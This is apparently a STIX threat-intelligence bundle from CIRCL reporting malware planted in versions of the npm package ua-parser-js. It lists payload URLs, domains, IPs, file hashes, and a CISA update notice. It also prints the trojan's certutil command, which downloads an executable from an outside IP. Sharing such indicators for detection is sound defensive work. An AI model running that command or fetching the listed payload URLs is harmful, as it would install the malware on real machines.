{ "type": "bundle", "id": "bundle--ad7665ec-fef2-44eb-a019-b1b25a8aec05", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--ad7665ec-fef2-44eb-a019-b1b25a8aec05", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "name": "Malware Discovered in Popular NPM Package, ua-parser-js", "published": "2021-10-24T08:26:47Z", "object_refs": [ "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325", "url--508a294c-876e-4a8a-a3bd-a3de15e10325", "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542", "url--f51805cb-5fec-4ce1-b7ae-1d1206720542", "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83", "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972", "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429", "indicator--9163b990-5b87-413c-a8e7-f616b908157f", "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "indicator--e1f2c049-da88-4238-9dde-4134209c1364", "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5", "relationship--a0fdbcd8-cfac-40ef-a21e-f3c6cda8dd66", "relationship--818e6669-8522-4878-98d9-2e2e94c1ea7d", "relationship--0626f727-f7d0-485d-acc9-2438cae6efbc", "relationship--2cb2f5de-43e7-4e09-a605-90c446dfc9b2", "relationship--6345305f-8dee-46ee-b85a-5fee99199d2f", "relationship--77ff2a21-c177-41e9-8d99-822cdcdbb926", "relationship--e13a000e-2466-4106-b377-41ebfa880f72", 
"relationship--535d4630-1b4f-4390-9281-30123d986ad4", "relationship--7c956e05-e399-48a0-92ae-5caa11703924", "relationship--a188df7b-b970-4f4f-8836-8d58c4e6c50a", "relationship--8f3fd681-f8c6-4bc9-a5cd-e7de15ac5b53", "relationship--625b2ba7-426b-4c7d-be69-8232c14da018" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "type:OSINT", "osint:lifetime=\"perpetual\"", "osint:certainty=\"50\"", "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"", "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:52:52.000Z", "modified": "2021-10-24T07:52:52.000Z", "first_observed": "2021-10-24T07:52:52Z", "last_observed": "2021-10-24T07:52:52Z", "number_observed": 1, "object_refs": [ "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0", "value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:54:51.000Z", "modified": "2021-10-24T07:54:51.000Z", "first_observed": "2021-10-24T07:54:51Z", "last_observed": "2021-10-24T07:54:51Z", "number_observed": 1, "object_refs": [ "url--508a294c-876e-4a8a-a3bd-a3de15e10325" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--508a294c-876e-4a8a-a3bd-a3de15e10325", "value": 
"https://github.com/faisalman/ua-parser-js/issues/536" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:58:30.000Z", "modified": "2021-10-24T07:58:30.000Z", "first_observed": "2021-10-24T07:58:30Z", "last_observed": "2021-10-24T07:58:30Z", "number_observed": 1, "object_refs": [ "url--f51805cb-5fec-4ce1-b7ae-1d1206720542" ], "labels": [ "misp:type=\"url\"", "misp:category=\"Payload delivery\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--f51805cb-5fec-4ce1-b7ae-1d1206720542", "value": "http://159.148.186.228/download/jsextension.exe" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:59:03.000Z", "modified": "2021-10-24T07:59:03.000Z", "pattern": "[url:value = 'https://citationsherbe.at/sdd.dll']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T07:59:03Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T07:59:45.000Z", "modified": "2021-10-24T07:59:45.000Z", "pattern": "[domain-name:value = 'citationsherbe.at']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T07:59:45Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": 
"indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:00:44.000Z", "modified": "2021-10-24T08:00:44.000Z", "description": "sdd.dll", "pattern": "[file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:00:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Artifacts dropped" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9163b990-5b87-413c-a8e7-f616b908157f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:01:14.000Z", "modified": "2021-10-24T08:01:14.000Z", "description": "jsextension.exe", "pattern": "[file:hashes.SHA256 = '47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:01:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Artifacts dropped" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "labels": [ "misp:name=\"report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "link", "object_relation": "link", "value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js", "category": "External analysis", "uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8" }, { "type": "text", "object_relation": "summary", "value": "Versions of a popular NPM package named 
ua-parser-js were found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administrators using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js.", "category": "Other", "uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424" }, { "type": "text", "object_relation": "type", "value": "Alert", "category": "Other", "uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601" } ], "x_misp_meta_category": "misc", "x_misp_name": "report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:23:57.000Z", "modified": "2021-10-24T08:23:57.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe", "category": "Other", "uuid": "974258e7-2e79-413c-9be8-08698653b87b" }, { "type": "text", "object_relation": "description", "value": "The trojan tries to execute in cmd", "category": "Other", "uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:11:49.000Z", "modified": "2021-10-24T08:11:49.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"", 
"cycat:scope=\"detection\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "npm show ua-parser-js time", "category": "Other", "uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec" }, { "type": "text", "object_relation": "description", "value": "To check the time when the package was installed", "category": "Other", "uuid": "542061ee-8993-44ef-8261-f27f25dc9067" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:21:22.000Z", "modified": "2021-10-24T08:21:22.000Z", "pattern": "[domain-name:value = 'citationsherbe.at' AND domain-name:resolves_to_refs[*].value = '95.213.165.20']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:21:22Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "network" } ], "labels": [ "misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e1f2c049-da88-4238-9dde-4134209c1364", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:03:02.000Z", "modified": "2021-10-24T08:03:02.000Z", "pattern": "[domain-name:resolves_to_refs[*].value = '159.148.186.228']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:03:02Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "network" } ], "labels": [ "misp:name=\"domain-ip\"", "misp:meta-category=\"network\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:21:44.000Z", "modified": "2021-10-24T08:21:44.000Z", "description": "Vulnerable npm package 
UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n", "pattern": "[file:x_misp_pattern_in_file = 'ua-parser-js']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:21:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:17:31.000Z", "modified": "2021-10-24T08:17:31.000Z", "pattern": "[file:hashes.MD5 = 'de8b54a938ac18f15cad804d79a0e19d' AND file:hashes.SHA1 = 'b6004c62e2d9dbad9cfd5f7e18647ac983788766' AND file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-10-24T08:17:31Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-10-24T08:22:57.000Z", "modified": "2021-10-24T08:22:57.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2021-10-24T04:03:55+00:00", "category": "Other", "comment": "sdd.dll", "uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed" }, { "type": "link", "object_relation": "permalink", "value": 
"https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235", "category": "External analysis", "comment": "sdd.dll", "uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11" }, { "type": "text", "object_relation": "detection-ratio", "value": "23/50", "category": "Artifacts dropped", "comment": "sdd.dll", "uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a0fdbcd8-cfac-40ef-a21e-f3c6cda8dd66", "created": "2021-10-24T08:25:55.000Z", "modified": "2021-10-24T08:25:55.000Z", "relationship_type": "alerts", "source_ref": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c", "target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--818e6669-8522-4878-98d9-2e2e94c1ea7d", "created": "2021-10-24T08:09:17.000Z", "modified": "2021-10-24T08:09:17.000Z", "relationship_type": "is-in-relation-with", "source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "target_ref": "indicator--e1f2c049-da88-4238-9dde-4134209c1364" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0626f727-f7d0-485d-acc9-2438cae6efbc", "created": "2021-10-24T08:10:03.000Z", "modified": "2021-10-24T08:10:03.000Z", "relationship_type": "downloads", "source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "target_ref": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2cb2f5de-43e7-4e09-a605-90c446dfc9b2", "created": "2021-10-24T08:23:57.000Z", "modified": "2021-10-24T08:23:57.000Z", "relationship_type": "related-to", "source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e", "target_ref": "indicator--9163b990-5b87-413c-a8e7-f616b908157f" }, { 
"type": "relationship", "spec_version": "2.1", "id": "relationship--6345305f-8dee-46ee-b85a-5fee99199d2f", "created": "2021-10-24T08:11:49.000Z", "modified": "2021-10-24T08:11:49.000Z", "relationship_type": "identifies", "source_ref": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006", "target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--77ff2a21-c177-41e9-8d99-822cdcdbb926", "created": "2021-10-24T08:15:51.000Z", "modified": "2021-10-24T08:15:51.000Z", "relationship_type": "is-in-relation-with", "source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "target_ref": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e13a000e-2466-4106-b377-41ebfa880f72", "created": "2021-10-24T08:21:22.000Z", "modified": "2021-10-24T08:21:22.000Z", "relationship_type": "related-to", "source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b", "target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--535d4630-1b4f-4390-9281-30123d986ad4", "created": "2021-10-24T08:06:58.000Z", "modified": "2021-10-24T08:06:58.000Z", "relationship_type": "executes", "source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "target_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7c956e05-e399-48a0-92ae-5caa11703924", "created": "2021-10-24T08:16:24.000Z", "modified": "2021-10-24T08:16:24.000Z", "relationship_type": "downloads", "source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a188df7b-b970-4f4f-8836-8d58c4e6c50a", "created": "2021-10-24T08:21:44.000Z", "modified": "2021-10-24T08:21:44.000Z", "relationship_type": 
"describes", "source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd", "target_ref": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8f3fd681-f8c6-4bc9-a5cd-e7de15ac5b53", "created": "2021-10-24T08:17:32.000Z", "modified": "2021-10-24T08:17:32.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b", "target_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--625b2ba7-426b-4c7d-be69-8232c14da018", "created": "2021-10-24T08:22:57.000Z", "modified": "2021-10-24T08:22:57.000Z", "relationship_type": "related-to", "source_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5", "target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }